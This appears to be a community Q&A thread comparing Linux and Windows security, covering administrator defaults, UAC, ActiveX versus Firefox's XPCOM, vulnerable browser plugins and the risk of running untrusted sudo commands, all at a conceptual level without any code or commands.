Windows has had a single-user ethos for a very long time. Even with the invention of NT and a role/privilege system, default installs would plonk users as king of the hill. Their account (and, more importantly, anything running as their account) could do anything to any file without a check.
This is huge because any application, any exploit in an application could run as Administrator.
It's only since Vista where that's trying to be reversed and tightened with things like UAC...
Source access is a double-edged sword. Open source enthusiasts usually tout security but it does also let people right into the system. They don't have to report anything they find, they could just write exploits for the hole.
Thankfully, most people do report any flaws they find. Even better is they sometimes include patches that can be immediately tested and distributed.
The turnaround for patching security holes does seem shorter than closed source software.
There are just fewer of us.
Sounds bleak but there are fewer people using one particular open source application. It's hard to justify writing an exploit, trojan, worm, etc when you could write one for Windows in the same time and catch a lot more people.
But we can't be complacent. There's no reason why a trojan or worm can't work in Linux. A malicious app running as a limited user can still do a whole load of damage. And the real flaw in all of this is the users.
Users are idiots who can be convinced to do almost anything if you dress it up with enough pomp or make it look like they're going to get something worthwhile from the process.
Read: Linux isn't invulnerable. Don't say it is. (Disclaimer: my post, my blog)
does firefox under ubuntu has something similar to activeX, in terms of security vulnerability?
‘ActiveX’ can be considered in two parts, the object model and the installation method. Firefox has something similar—and cross-platform compatible, Ubuntu or other—for both.
The object model of ActiveX is Microsoft COM; Firefox's equivalent is XPCOM. Many other Windows features and applications that are nothing to do with web browsing use MS COM, and there have traditionally been endless problems where COM controls that were not written for secure web usage were nonetheless available to web pages. This caused many compromises. Firefox is better off here as XPCOM is not shared with the rest of the system. Newer versions of IE have better controls for mitigating what sites are allowed to use what controls.
(As a side-issue, because many add-ons for Firefox are themselves written in JavaScript, a high-level scripting language, they are often more secure from buffer overflow and string handling errors than extensions for IE which are commonly written in C[++].)
The control-downloader part of ActiveX has also been cleaned up a bit since the bad old days when anything in the My Computer zone could install any software it liked, and aggressive loader scripts could trap you in an alert
loop until you agreed to approve the ActiveX prompt. Firefox's equivalent, XPInstall, behaves largely similarly, with the ‘information bar’ on all but Mozilla's sites by default and a suitable warning/prompt before installation.
There is another built-in way you can compromise yourself in Mozilla: signed scripts. I have never seen this actually used, and certainly there'll be another warning window appear before a script gains extra rights, but it kind of worries me that this is available to web pages at all.
for example an exploit through flash will gain access to my pc under my user rights
Yes, the majority of web exploits today occur in plugins. Adobe Reader, Java(*) and QuickTime are the most popular/vulnerable. IMO: get rid of those, and use FlashBlock to only show Flash when you want it.
(*: and Java's dialogues before it lets you give up all security to some untrusted applet is a bit bare too.)
Ubuntu gives you some questionable plugins by default, in particular a media player plugin that will make every vulnerability in any of your media codecs exploitable through the web (similar to the Windows Media Player plugin, only potentially with many more formats). Whilst I have yet to meet an exploit targeting Linux like this, that's really only security through obscurity.
Note that ActiveX itself is no different. A web browser compromise based on ActiveX still only gives user-level access; it's only because prior to Vista everyone habitually ran everything as Administrator that this escalated to a full-on rooting.
and then follow to exploit some known vulnerability in X to gain root rights. that is not "easy".
Maybe, maybe not. But I think you'll find the damage some malware can do from even a normal user account is quite bad enough. Copy all your personal data, observe your keypresses, delete all your documents...
Best Answer
A system is never 100% secure and there are always vulnerabilities, in every OS. Some are known and some still want to get discovered though. It's a fact though that the UNIX/Linux security architecture (from which also Apple's OSX is derived) is much stronger than the one Windows had in the past and I believe it's even still slightly stronger than what they have nowadays, although the difference got minimized.
The advantage of a system with a very low user count is that hackers (only speaking of black hats that want to attack you) have a pretty small interest in spending their time on Linux, because even if they find an open backdoor, they can't make much profit with it as there are too few potential targets.
So the more users an OS has, the more interesting is it for people with criminal powers to find and exploit vulnerabilities. This however means also, that more white hat researchers will check it out and fix some of those problems. So there will always be a balance between white and black, though experience shows us that the dark side usually has a slightly higher growth rate.
However, the OS itself is not getting more insecure or vulnerable once there is a high user base. The weak points remain the same, they just were not known earlier. But as knowing a problem is required to be able to fix it...
However, it's not really correct to say that Linux in general has a small user base today. Desktop computers mainly run Windows and no Linux distributions, but that's not the only type of computer we have. A majority of the web servers operate on Linux as well as e.g. the Android OS for smartphones is actually Linux-based. These systems all have major differences, so a hack on one would probably not work on the other, especially as installed Software is much more vulnerable than the system/kernel itself, so an attacker would rather try to break into that or trick the user.
Additionally (thanks @Rinzwind) it's also important to say that Linux systems in general can be seen as systems for advanced users (total computer noobs probably haven't even heard anything about it yet), whereas Windows is just what everybody uses, no matter what skills he/she has, as it comes preinstalled on almost every machine nowadays. This is important because many attacks depend on vulnerabilities of the interface between keyboard and chair, also known as "The User". Of course, many also just think they're experts and pay even less attention when downloading .deb packages from websites or compiling foreign code from source, because they believe the myth of "bulletproof Linux". So just copy-pasting sudo commands or installing Software as root is and stays dangerous, because Linux systems are not designed to protect the user from themselves!
To conclude we can say that higher user numbers make the OS more secure in theory, as more vulnerabilities are detected and fixed, especially as it is Open Source. But practically this also increases the number of attacks, as it becomes a more interesting target.
The system itself is however usually the strongest part of the security chain, the weak parts are vulnerabilities in additional software (browsers, flashplayer...) or the users themselves, as it's easy to trick non-experts and let them install malicious programs or run evil copy-pasted sudo commands.